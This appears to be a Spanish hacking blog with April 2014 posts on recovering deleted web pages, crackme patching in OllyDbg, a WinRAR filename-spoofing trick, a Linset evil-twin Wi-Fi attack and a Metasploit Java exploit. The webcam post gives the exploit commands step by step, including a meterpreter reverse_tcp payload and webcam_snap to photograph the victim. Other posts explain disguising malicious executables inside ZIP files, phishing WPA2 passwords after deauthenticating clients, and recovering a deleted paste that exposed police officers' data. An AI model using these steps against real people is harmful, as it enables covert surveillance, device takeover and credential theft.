sábado, 26 de abril de 2014

Recupera paginas web en el tiempo


Muchas veces hemos hablado de lo "rencoroso" que es Internet y que no se olvida de nada, pues hoy vamos a hablar de hasta que limites podemos buscar esas paginas en Cache desde hace años.

La herramienta que usaremos sera wayback machine, una herramienta online que nos permitirá ver snapshot de paginas web en días concretos. Esto puede ayudarnos a saber como estaba la web en ese momento y recuperar imágenes, texto o simplemente ver su evolución en el tiempo.

web de coca-cola 2004
Pagina web de Coca-Cola el 17 de Octubre de 2004


Y si queremos un articulo en concreto borrado de una pagina, ¿Puedo recuperarlo?, pues esto dependerá si fue cacheado por los buscadores y de la habilidad que tengamos para buscarlo.

Aquí usaremos nuestros trucos que explicamos en Hacking con buscadores, no hay un buscador infalible y deberemos jugar tanto con Google y Bing principalmente porque su bot es diferente con lo que aumenta nuestras posibilidades de éxito


Usaremos si conocemos datos de lo que queremos buscar asi> site:www.lawebabuscar.com "palabra clave"

Site nos permite filtrar a solo las URLs cacheadas de esa pagina.
"texto" Obliga a que este exactamente ese texto en la URL, decripción, meta o en el propio texto de la noticia.

Ejemplo practico:

Buscaremos wiki en pastebin que publicaban los datos de los antidisturbios UIP.


Vaya, esta borrado.... no tan deprisa vaquero. Google nos permite ver sus paginas en cache, que es el momento por el que paso el Bot (araña) y guardo como si fuera una captura de su estado, con lo que señalando "En cache", podremos ver un estado anterior.



Y este es el resultado:


Como veis, se puede recuperar en este caso todo el wiki publicado a la fecha que nos marca en la parte superior, lo que es un arma de doble filo, bueno para unas personas pero una maldición para otras, pero esto es Internet, y te tiene que gustar tal como es.

Disfrutad todo lo que podáis y Happy Hacking!!



martes, 22 de abril de 2014

Hackear webcam windows 7


Hoy os traigo algo muy parecido a hacking Windows 7 entero con metasploit y los cursos de metasploit realizados, hoy quería compartiros un ataque a través de una vulnerabilidad de Java en vez de tener que crear un ejecutable .exe como hicimos en uno de los mencionados anteriormente.

Fácil, sencillo y para toda toda la familia, como dice el de Bricomania.


¿Que necesitamos? Un equipo con Windows 7 con Java 7.11 o inferior y un equipo con Kali Linux que estén en la misma red.


Para saber la versión de java escribimos en el inicio de windows: javaws -viewer
Java 7.11 

Empezamos!! 

Lo primero que hacemos es realizar un escaneo de puertos con Nmap para saber mas de nuestra victima.
Escaneo a nuestro objetivo con Zenmap



Una vez tenemos ya estudiado a nuestro objetivo preparamos la artilleria, para ello usaremos Metasploit, yo usare Kali Linux pero podeis usar vuestro sistema operativo preferido.


Lo primero es aconsejable actualizarlo: msfupdate



Abrimos metasploit con: msfconsole

kali linux metasploit

Usaremos un exploit de Java que afecta a las versiones Java 7 actualización 11. Similar al skeleton. search jmxbean
buscar metasploit

Empezamos a configurar el exploit:
use exploit/multi/browser/java_jre_17_jmxbean_2 
set srvhost 192.168.1.67 (Ip del atacante)
set target 1 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.67

Y le damos fuego: exploit, ahora se levanta el servidor y esperara una petición por el puerto 80.


Cuando se este conectando veremos que existe interactuación entre ambas maquinas y la victima esta solicitando la pagina del servidor.
Victima accediendo a la web que nos indica metasploit

Una vez lo tengamos escribimos sessions -i 1, y conseguiremos la consola de meterpreter para que podamos empezar a jugar.
exploit java windows 7


Llegados a este punto tenéis una consola en su equipo, con lo que podemos hacer prácticamente de todo con su ordenador: Keyloggers, abrir puertos, acceder a su webcam, subir y descargar archivos....

Ahora vamos a acceder a su webcam: webcam_snap
victima cazada metasploit
Fotografía de la victima


Y ahora podéis ver esta lista de comandos para poner todo su potencial en practica.


¿Como me protejo de este ataque? Las actualizaciones que tanto os molestan sirven para parchear estos problemas de seguridad, con lo que ten siempre tu software actualizado a la ultima versión estable.

Saludos guerreros!!

martes, 15 de abril de 2014

Cracking basico: Crackear programa

Seguimos con el cracking basico para principantes, hoy vamos a crackear el programa para que siempre de cierto.


Conceptos que debemos saber de ensamblador:
Los saltos, son instrucciones que hacen saltar al programa de una instrucción a otra, los dividiremos en 2 tipos:

Saltos normales (JMP): Saltan de una instrucción a una nueva dirección u offset (posicion en un array)

Saltos condicionales (JNZ): Saltan al cumplirse una condicion especificada en un flag, ejecutandose si el resultado de la operación es 0.


Dos funciones que debemos saber para seguir son:
Printf - Imprime un valor por pantalla
Scanf - Detecta el resultado escrito por pantalla


Si ponemos en practica estos conceptos veremos el flujo del programa, 

Lo primero escribe pass?, detecta el valor escrito y con el JNZ comprueba si es cierto.


¿Ya sabéis que significa esto?, pues efectivamente cambiando el JNZ por un resultado que siempre de valido tendremos que siempre funcione, así que presionamos doble click esa linea y cambiamos JNZ por JZ (Lo contrario a JNZ), una vez cambiado pulsamos Assemble para ensamblar el programa de nuevo.

En el programa escribimos cualquier valor, y veremos que siempre da cierto.



Espero que os haya gustado el primer contacto con ensamblador  y el mundo del cracking, y que esto sea el principio en este mundillo.

Happy Cracking!

domingo, 13 de abril de 2014

Cracking basico para principiantes


Hoy me puse a investigar sobre el mundo del cracking, el poder oculto detrás de la pantalla visible al usuario, un mundo apasionante, puro arte y con mucho que decir.


Primera practica
Pienso que lo primero es ver el poder del cracking e ir metiendo poco a poco la base teórica, lo que vamos a hacer es coger un programa que nos pide una contraseña y la vamos a extraer.

Descargamos este fichero aquí,perteneciente a myamoto340 de Hackxcrack.


Al no saber la contraseña tendremos que inventar alguna manera para acertar. Pues aquí es donde entra el debugger, es un programa para probar y depurar un programa (eliminar) los errores de los programas.

Descargaremos Ollydbg, uno de las estrellas para este proceso.


Abrimos crackme.exe con Ollydbg.
Pantalla superior izquierda: Cada linea es una instrucción del programa que se ejecuta.
Pantalla superior derecha: Registros del procesador y estado de los flags.
Pantalla inferior izquierda: Es el dump
Pantalla inferior derecha: Es el stack o pila.

Con F9, ejecutamos el programa.

Ahora para agilizar la búsqueda buscaremos cadenas de texto. En la pantalla apretamos boton derecho > Search for > All referenced strings.


Nos aparece una pantalla, donde vemos: pass? y vemos Oh, shit! Cracked!, este mensaje saldrá cuando sea cierto.


Si hacemos pruebas con el programa vemos que nos sigue pidiendo la pass, y cada palabra - espacio, escribe un pass?. Con lo que habra que seguir buscando.


domingo, 6 de abril de 2014

explotar 0 day en winrar

Vamos a explicar como explotar un 0-day en Winrar  que salio a la luz hace poco por el researcher en seguridad Danor Cohen de Ant7i, que afecta a la versión 4.20 de Winrar y que nos permitirá modificar nombres de archivos para que no parezca sospechoso.

* El 0-day lo podemos interpretar como el tiempo desde que se encuentra un bug o exploit hasta que sale su solución (parche) que solvente esta debilidad y el día 1 es el día que sale el parche.

Descripción: Creamos un fichero .zip que incorpore un archivo .pdf y con un editor hexadecimal lo forzaremos para hacerlo .mp3


Empezamos descargandonos el Winrar 4.20, puedes descargarlo aquí en catalán de Softonic.


Caso practico:
Seleccionamos una canción cualquiera que sea .mp3 y la cambiamos a .pdf
fichero pdf


Este pdf lo añadimos con winrar a un archivo .zip
pdf en un zip



Hasta aquí todo "normal", ahora es cuando viene el bug o magia para algunos. Necesitaremos un editor hexadecimal para esta practica, yo usare XVI32 para este caso, y abrimos el zip que hemos creado.

Localizamos el nombre de los ficheros que hay en el interior y podemos modificar su nombre y extensión. El mio es BSOangrybirds.pdf
localizar nombre en zip
Archivo zip abierto con XVI32



Y lo renombramos por el nombre que mostraremos una vez que demos el doble click, lo guardamos...
alterando archivo zip
Sustitución por BSOjarrybirds.mp3


Por ultimo vamos a probarlo. Cuando abrimos el archivo zip vemos que sigue siendo BSOangrybirds.pdf pero al abrirlo, nos carga un archivo BSOjarrybirds.mp3 con el reproductor de música que tengamos por defecto.
ejecución zip alterado
Demostración de funcionamiento del 0-day



Nosotros hemos hecho la prueba con un mp3 pero podría haber sido un ejecutable malicioso, como puede ser un .exe, .bat u otros scripts en lenguajes de programación utilizando este mismo procedimiento. Esto es un grave problema de seguridad, poder ocultar visualmente lo que se va a ejecutar.




Espero que os haya gustado y...


Happy Hacking!!

miércoles, 2 de abril de 2014

Linset hack wpa2 sin wps

Linset es una herramienta basada en Evil twin attack, que nos permitirá conseguir claves wpa y wpa2 sin WPS. Al mismo estilo que lo hicimos con AirSSL.

El tipo de evil twin, consiste en simular un router igual al que queremos atacar, desautenticamos a todos los clientes del router bueno y si algún cliente se conecta al maligno e introduce la clave en un formulario ya la tendremos, así de sencillo y rápido.

Descarga: 
Linset lo descargaremos de aquí, que es el repositorio de vk496, autor de la herramienta.

En la distribucion Wifislax 4.8 ya viene incluida, en Wifislax > Wpa > Linset (Evil twin attack).


Ejecución
Lo mas normal es que el archivo lo hayamos guardado en descargas y posteriormente lo ejecutamos. Abrimos una consola de comandos y escribrimos lo de naranja:

Nos movemos a descargas: cd Descargas
Damos permisos a todos los usuarios de ejecución: chmod a+x linset
Lo ejecutamos: linset
linset wlan0
Inicio de Linset y seleccion de la tarjeta.

Seleccionamos la interfaz: 1 (En mi caso corresponde a mi tarjeta Alpha.
Seleccionamos el canal: 1 (Escanear todo)

Nos empezara a capturar redes, cuando tengamos las deseadas, pulsamos Control + C , para que pare de capturar.
airodump wifis linset
Redes capturadas, seleccionamos una que tenga clientes.

Método de verificación de pass: 1 Handshake(Recomendado)
Tipo de comprobación del handshake: 1 Estricto
Capturar handshake del cliente: 1 Realizar desaut. masiva al AP objetivo

captura handshake
Desautentificación y captura del handshake

Selecciona la interface web: 1 Interfaz web neutra.
Selecciona idioma: 2 Spanish

configurar lenguaje linset
Elección de idioma e info del objetivo

Y empezara el ataque, levanta el evil twin (Punto wifi malvado con idéntico nombre pero con autentificación open y luego echa a todos los clientes de la red verdadera para forzarlos a conectarse a la malvada y se queda así esperando una contraseña.

evil twin linset



Desde un móvil/pc/tablet victima que estuviera conectado a la red y elija la malevola conseguirá acceder sin ningún problema a la red, pero al intentar cargar una pagina le saldrá un mensaje, y justo en el momento que presione enviar es enviada al atacante y automáticamente comprueba si es verdad la contraseña, en el caso de que no sea, saldrá que no es correcta.
web introducir contraseña

Pero.... si esta esta correcta al atacante le aparecerá el mensaje como que la ha conseguido y la correspondiente password.
wifi wpa2 conseguida


Un ataque muy sencillo interactuando con clientes de una red, que debemos cuidar como usuarios saber bien donde introducimos la contraseña y quien puede haber detrás de esa pantalla de login.


**Esta práctica no tiene intenciones maliciosas, es un entorno de laboratorio controlado por el administrador, el cual es usado para aprender sobre las tecnologías, concienciar de los peligros de sus usos y evitar ser victima de un engaño.


Saludos!!